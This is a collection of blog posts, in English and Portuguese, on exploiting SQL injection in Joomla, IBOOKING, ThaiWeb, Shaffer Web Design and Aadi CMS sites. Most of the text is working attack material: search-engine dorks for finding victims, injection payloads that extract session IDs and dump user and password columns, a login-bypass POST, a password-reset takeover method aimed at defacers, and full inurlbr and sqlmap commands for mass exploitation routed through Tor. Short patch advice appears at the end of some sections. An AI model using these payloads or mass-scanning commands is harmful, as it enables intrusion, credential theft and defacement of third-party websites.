Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access / inurlbr scanner for mass exploitation.

Joomla CMS that affects more than 2.8 million sites.
Joomla is probably one of web content management (or CMS) more used to creating websites at the enterprise level but also widely used for developing personal websites.
It is an Open source software under the GNU / GPL license, being updated by a community of programmers organized a non-profit structure (Joomla.org).
According to Trustwave joomla CMS (3.2 to 3.4.4) have serious security flaws enabling SQL Injection-type attacks which allow attackers to "win" platform Administrator privileges

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.

Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.

CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.

The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.
Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Source INFO-> [  More Info ]

It was found that the following code snippet is vulnerable SQLI:
PWD: /administrator/components/com_contenthistory/models/history.php

FUNCTION FULL:

 /**
  * Build an SQL query to load the list data.
  *
  * @return  JDatabaseQuery
  *
  * @since   3.2
  */
 protected function getListQuery()
 {
  // Create a new query object.
  $db = $this->getDbo();
  $query = $db->getQuery(true);

  // Select the required fields from the table.
  $query->select(
   $this->getState(
    'list.select',
    'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
    'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
   )
  )
  ->from($db->quoteName('#__ucm_history') . ' AS h')
  ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
  ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))

  // Join over the users for the editor
  ->select('uc.name AS editor')
  ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

  // Add the list ordering clause.
  $orderCol = $this->state->get('list.ordering');
  $orderDirn = $this->state->get('list.direction');
  $query->order($db->quoteName($orderCol) . $orderDirn);

  return $query;
 }

CODE FULL:
http://pastebin.com/9FnPuns5

PoC:
REQUEST GET
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

It is possible to extract session ID (cookies) of users logged into the system and set in your browser.

Video demonstration:


In this article we will work SQLI exploitation.

RETURN REQUEST - Exemple Explotation:
URL:
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
PRINT REQUEST:

Base validation:
ENCODER HEX =  :INURLBR: 
RESULT =                0x203a494e55524c42523a20

INJECT: 0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20....

DORK:

1. components/com_contenthistory/
2. inurl:com_contenthistory
3. index.php?option=com_contenthistory
4. "index of" components/com_contenthistory/
5. inurl:"components/com_contenthistory/"
6. inurl:"index.php?option=com_contenthistory"

Search demonstration:

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
 --dork 'YOU_DORK'
 OR
 --dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-q all
  we will use all the search engines available in the script

SET OUTPUT FILE:
 -s com_contenthistory.txt

SET TIPE VALIDATION:
 -t 2
    2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
              It also establishes connection with the exploit through the get method.

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.localhost.br/user?id=313032303330

--exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))'

hex(INURLBR) = 494e55524c4252

Example injection:
http://www.target.localhost.br/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example:  -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'INURLBR'

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.
   removes all gets the URL

Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL: 
php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique


Execution return:

SOLUTION:Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html

Source INFO-1-> https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0

Source INFO-2-> https://cxsecurity.com/issue/WLB-2015100146

Source INFO-3-> http://pplware.sapo.pt/informacao/alerta-milhoes-de-sites-baseados-no-joomla-estao-vulneraveis/

( 0day ) IBOOKING CMS - INJEÇÃO DE SQL e Exploração em massa

IBOOKING CMS é um sistema voltado pro ramo de hotelaria, gerenciamento de reservas.
Como próprio site do desenvolvedor diz:

Motor de Reservas: Com o nosso motor de reservas você pode vender as diárias do seu hotel diretamente no seu site e sem precisar pagar comissão. Uma forma eficaz de ampliar sua lucratividade e interagir com o cliente desde o momento da compra.

Tal sistema tem uma falha grave de Injeção SQL, explorada via request GET no parâmetro idPousada do arquivo filtro_faixa_etaria.php dentro da pasta ou URL dinâmica /motor-de-reservas/. INFORMAÇÕES: 

[+] FORNECEDOR: WWW.ibooking.com.br
[+] VERSÕES VULNERÁVEIS: TODAS [+] ARQUIVO: filtro_faixa_etaria.php [+] PASTA OU URL DINÂMICA: /motor-de-reservas [+] PARÂMETRO:  idPousada(GET)
[+] DORK: intext:"Desenvolvido por ibooking" [+] REPORTADO: 15/10/2015

A request vulneravel é feito através de uma function javascript encontrada dentro de /motor-de-reservas

Código:

jQuery(function($){        
   $("#quartos").change(function() {
     var qtde_quartos = $(this).val(); 
     $.ajax({ 
       type: "GET", 
       url: "filtro_faixa_etaria.php", 
       data: "qtde_quartos="+qtde_quartos+"&idPousada=61", 
       success: function(xml){ 
        $("#filtro_faixa_etaria").html(xml);
       } 
     }); 
  }); 
  
  $.ajax({ 
    type: "GET", 
    url: "filtro_faixa_etaria.php", 
    data: "qtde_quartos=1&idPousada=61", 
    success: function(xml){ 
      $("#filtro_faixa_etaria").html(xml);
    } 
  }); 
  
   
 });

URL Vulnerável:

http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

POC:

http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(INJEÇÃO_SQL) Exemplo:

http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

Detalhes na injeção SQL é usado FUNCTIONS básicas de injeção, mas seu diferencial é uso de variáveis Globais do MySQL.

@@GLOBAL.version = VERSÃO BANCO DE DADOS MYSQL
@@GLOBAL.version_compile_os = SERVIDOR COMPILADO
@@GLOBAL.version_compile_machine = TIPO DE ARQUITETURA  DO SERVIDOR

Também passo a string ::INURLBR_VULN:: no formato hexadecimal, para assim posteriormente validar se a injeção ocorreu como esperado.
0x203a3a494e55524c42525f56554c4e3a3a20 = ::INURLBR_VULN::

Print saída da injeção:

Exploração em massa usando scanner INURLBR
Baixar: https://github.com/googleinurl/SCANNER-INURLBR

Montando comando:

SETANDO DORK DE PESQUISA
--dork 'YOU_DORK'
- USE --dork 'intext:"Desenvolvido por ibooking"'

SETANDO ARQUIVO DE SAÍDA:
- USE: -s 'ibooking.txt'

SETANDO STRING EXPLOIT GET
--exploit-get 'EXPLOIT_GET'
- USE: --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

SETANDO TIPO DE VALIDAÇÃO: 
- USE: -t 3 
3 O terceiro tipo tenta válido o erro definido por: -a 'VALUE_INSIDE_THE _target " mais as validações padrões do scanner, o diferencial é que  --exploit-get é injetado direto na url:
Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php

SETANDO STRING DE VALIDAÇÃO:
Especifique a string que será usada como validação no script:
Exemplo:  -a {string}
Usando:    -a '<title>hello world</title>'
Se o valor específico é encontrado no alvo, ele é considerado vulnerável.
- USE:     -a 'INURLBR_VULN'
O valor INURLBR_VULN é passado no formato hexadecimal na string exploit-get

COMANDO COMPLETO:

php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN'

Print saída:

EXPLORANDO VIA SQLMAP:

python sqlmap.py -u 'http://ww.target.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=10,level=3,risk=2,dbms=MySQL,testing=Y,WAF/IPS/IDS=Y,check=Y'

EXPLORANDO INURLBR + SQLMAP:

Usando parâmetro da ferramenta inurlbr --command-vul, vai executar comando sqlmap quando constatar uma possível vulnerabilidade de acordo com as informações passadas.

php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' --command-vul "python sqlmap -u 'http://_TARGET_/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=2,level=3,risk=2,dbms=MySQL,technique=BEUS,testing=Y,WAF/IPS/IDS=Y,check=Y' --flush-session"

Print saída: 

Solução ?

Use PDO.
http://php.net/manual/pt_BR/book.pdo.php

Use Prepares  statement sem moderação:

http://php.net/manual/pt_BR/pdo.prepare.php

Filtro de request seja POST ou GET:

http://php.net/manual/en/filter.filters.sanitize.php

O arquivo aparecendo ou não para o cliente, ele pode ser vulnerável do mesmo jeito.

Outra falha que foi encontrada no sistema semana passada de titulo:
(0day) IBOOKING CMS - LOCAL FILE DISCLOSURE VULNERABILITY
Encontrada por: Pablo Verlly Moreira, que já foi reportada e corrigida pelo admin, mas sem nem um agradecimento por parte da equipe.
https://ghostbin.com/paste/e99uz

Referencias:

http://seclists.org/fulldisclosure/2015/Sep/56

https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

https://www.owasp.org/index.php/Automated_Audit_using_SQLMap

https://dev.mysql.com/doc/refman/5.0/en/hexadecimal-literals.html

Scanner INURLBR explorando via post

(Bom dia, Boa tarde, Boa noite) rsrsrs, Quem vos escreve é googleINURL  venho trazer uma forma diferente de exploração com scanner INURLBR usando request POST.

Até o momento a grande utilização do scanner é feito por meio de exploração via  GET e validando valores de retorno, faremos o mesmo porem com comando voltados pro resquest POST.

Para tal tutorial vamos usar um exploit publicado no Exploit4arab

Exploit:

http://www.exploit4arab.net/exploits/1741 - Exploit Author : GeNeRaL

Affected Webs/Versions : All

O XPL trata-se de explorar um falha SQLI do painel de acesso administrativo do site, CMS feito pela empresa Shafferwebdesign.

Dork:

intext:"by Shaffer Web Design" ext:php

intext:"Designed by Shaffer Web Design" 

intext:"Website Development provided by Shaffer Web Design"

Acesso: 
http://www.xx.com/admin.php

POC:
Request POST

http://www.xx.com/login.php?email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.us/&Submit_Login=Login to My Account

Campos explorados com um simples Bypass:
email='=' 'OR'

password='=' 'OR'

Debug request:

• 1 - Enviamos o request Bypass para o arquivo login.php
• 2 - O servidor aceita o request e retorna código 302  http de redirecionamento.
• 3 - Somos redirecionados para pagina my_account.php do servidor.

Agora vamos montar comando para exploração via INURLBR.
Download:

https://github.com/googleinurl/SCANNER-INURLBR

Comando:

- Setar DORK de pesquisa:
Exemplo:

--dork Defines which dork the search engine will use.

     Example: --dork {dork}

     Usage:   --dork 'site:.gov.br inurl:php? id'

     - Using multiples dorks:

     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}

     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

Usando para exploração atual:

--dork 'intext:"by Shaffer Web Design" ext:php'

- Setar OUTPUT:

Exemplo:

-s  Specify the output file where it will be saved the vulnerable URLs.

     Example:  -s {file}

     Usage:    -s your_file.txt

Usando para exploração atual:

-s tutorial.txt

- Setar ifredirect validação da URL redirecionamento:

Exemplo:

 --ifredirect  Return validation method post REDIRECT_URL

     Example: --ifredirect {string_validation}

     Usage:   --ifredirect '/admin/painel.php'

Usando para exploração atual:

--ifredirect 'my_account.php'

- Setar string que será concatenada junto ao host, para isso usamos o exploit-get:

Exemplo:

 --exploit-get Defines which exploit will be injected through the GET method to each URL found.

     Example: --exploit-get {exploit_get}

     Usage:   --exploit-get "?'´%270x27;"

Usando para exploração atual:

--exploit-get '/login.php'

Ai fica a pergunta, mas por quê ? eu uso exploit-get em algo que é explorado via post ?
R: O comando exploit-get do script inurlbr é tratado mais como um concatenador de string adicionado no final de cada alvo depois executado, por esse motivo é possível usar ele sem altera o Request total.

- Setar request Bypass POST
Exemplo:
 --exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'

Usando para exploração atual:
--exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.theultimaterose.com/&Submit_Login=Login to My Account"

Comando completo:
php inurlbr.php --dork 'intext:"by Shaffer Web Design" ext:php' -s tutorial.txt --ifredirect 'my_account.php' --exploit-get '/login.php' --exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account"

Exemplo de Saída vulnerável:

OBS: Exemplo do print usei comando -o para abrir um arquivo com alvo.

Solução ?

1. Sempre filtre o que vem do cliente.
2. Não confie em dados que vem do cliente.
3. Filtre todo request seja get ou post $_REQUEST.
4. Use PDO sem moderação Prepared Statements é o poder.
5. Use filtros nativos do PHP filter_var

Referencia para soluções e estudos:
http://php.net/manual/pt_BR/security.database.sql-injection.php
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
http://php.net/manual/en/pdo.prepared-statements.php
http://us3.php.net/manual/en/filter.filters.validate.php
https://www.owasp.org/images/5/57/OWASP-AppSecEU08-Janot.pdf

Resetando senha WORDPRESS/JOOMLA via SQL injection

[0x00] Introdução

Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.

[0x01] Conceito Joomla

Não sei bem se podemos chamar de conceito porém esse termo se encaixa bem e se não me falha a memoria já vi um artigo similar em algum lugar só não me recordo o autor.

[0x01a] A Hash 

   A hash utilizada pelo Joomla é uma especie de MD5 que divide a senha em partes apos o : se o numero de caracteres for impar sera acrescentado um a mais na primeira md5.

[0x01b] Exemplo:
147c6577fd36d90147c4ee3a5a0cceaa:sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0 a parte em preto corresponde a 0X4 e a parte destacada em vermelho h4x

[0x02] Injeção 

É bem semelhante a uma injeção de SQL normal apenas mudamos as tabela e colunas que vão ser exploradas em um caso normal estaríamos atras de colunas responsável pelo armazenamento do nome de usuário e senha porém dessa vez buscaremos a tabela responsável pelos códigos de ativação e email.

[0x02b] Tabela alvo

 O alvo é _user o nome pode variar porem em 90% dos casos sempre possui _user e vamos pegar as colunas email e activation.

Pegaremos o email e o introduziremos em alvo.ru/index.php?option=com_user&view=reset apos isso é só colocar o código pego na coluna activation e será possível escolher uma nova senha.

[0x03] Conceito Wordpress

Não muda muita coisa da injeção em joomla apenas possui um tipo de hash ate o momento "desconhecida" 

[0x03a] Tabela alvo e colunas

                 a tabela alvo é wp_users e as colunas são user_login user_activation_key.

[0x03b] Resetando 

    é bem semelhante ao joomla apenas muda o caminho por trata se de CMS diferentes primeiro entraremos em alvo.ru/wp-login.php?action=lostpassword e colocaremos o usuário que desejamos mudar a senha usuário obtido na user_login apos isso entraremos em /wp-login.php?action=rp&key=l33ts&login=h4x0r.

[0x04] Explicação Wordpress

Bom creio que todos tenham entendido a parte l33ts e h4x0r mas para os desatentos onde possui l33ts na url você introduz o código correspondente obtido em user_activation_key e onde localiza se H4x0r é o usuário obtido em user_login.

Solução ?
Mantenha seu CMS sempre atualizado e informe-se sobre novas falhas .

ThaiWeb CMS 2015Q3 - SQL Injection Web Vulnerability

Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.

THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage.
We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.

We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard.
We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.

Fail discovery by:
Iran Cyber Security Group - Pi.Hack (www.Iran-Cyber.Org)

Description:
The vulnerabilities are located in the id_run value of the `index.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable id_run parameter. The request method to inject the sql command is GET and the location of the issue is application-side.

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1555

Release Date:
2015-07-23

Vulnerability Laboratory ID (VL-ID):
1555

Common Vulnerability Scoring System:
8.6

Vendor Homepage:
http://www.thaiweb.net/

Google Dork:
"Powered by ThaiWeb"
"Reserved. Powered by Thaiweb."
inurl:"index.php" "Powered by Thaiweb"

PoC:

• http://target/index.php?Content=product&id_run=[ID]'[SQL INJECTION VULNERABILITY!]
• http://target/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--

Admin Page:
www.target.com/_adminP/

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'YOU_DORK'
OR
--dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-a all
  we will use all the search engines available in the script

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.

   removes all gets the URL

SET OUTPUT FILE:
 -s ThaiWeb.txt 

SET TIPE VALIDATION:
-t 2
       2   The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
            It also establishes connection with the exploit through the get method.

SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:    hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330

--exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(:) = 3a

Example injection:
http://www.target.gov.br/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws,0x3a,0x696e75726c62725f76756c6e%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'inurlbr_vuln'

Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

OUTPUT PRINT:

ADMIN PAINEL:

COMMAND FULL:
php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

OUTPUT PRINT:

Source discovery: 
http://seclists.org/fulldisclosure/2015/Jul/109

Solution - Fix & Patch:
The security vulnerability can be patched by a secure parse and encode of the vulnerable id_run parameter value in the index.php file.
Restrict the input and use a prepared statement to secure the sql statement request via GET method.

How to Avoid SQL Injection Vulnerabilities
See the OWASP SQL Injection Prevention Cheat Sheet.
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
See the OWASP Query Parameterization Cheat Sheet.
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
See the OWASP Guide article on how to Avoid SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Guide_Project
https://www.owasp.org/index.php/Guide_to_SQL_Injection

How to Review Code for SQL Injection Vulnerabilities
See the OWASP Code Review Guide article on how to Review Code for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

How to Test for SQL Injection Vulnerabilities
See the OWASP Testing Guide article on how to Test for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

Explorando CMS Aadi Infosolutions com SQLMAP + INURLBR EM MASSA

Nesse artigo vamos explorar um padrão SQLI no CMS da empresa "Aadi Infosolutions",  muito usado por clientes Indianos.
Vamos usar sqlmap para injeção de SQL e Scanner inurlbr para buscar alvos em massa.

[+] Discoverer Author: Killer~X
[+] EMAIL:             [email protected]
[+] FACEBOOK:          http://www.fb.com/xXalreshyXx
[+] ASK:               http://www.ask.fm/ALRESHY

[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
DEBUG: sqlmap  
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- 

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch
OUTPUT PRINT:

[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"
OUTPUT PRINT:

REF
http://www.exploit4arab.net/exploits/1486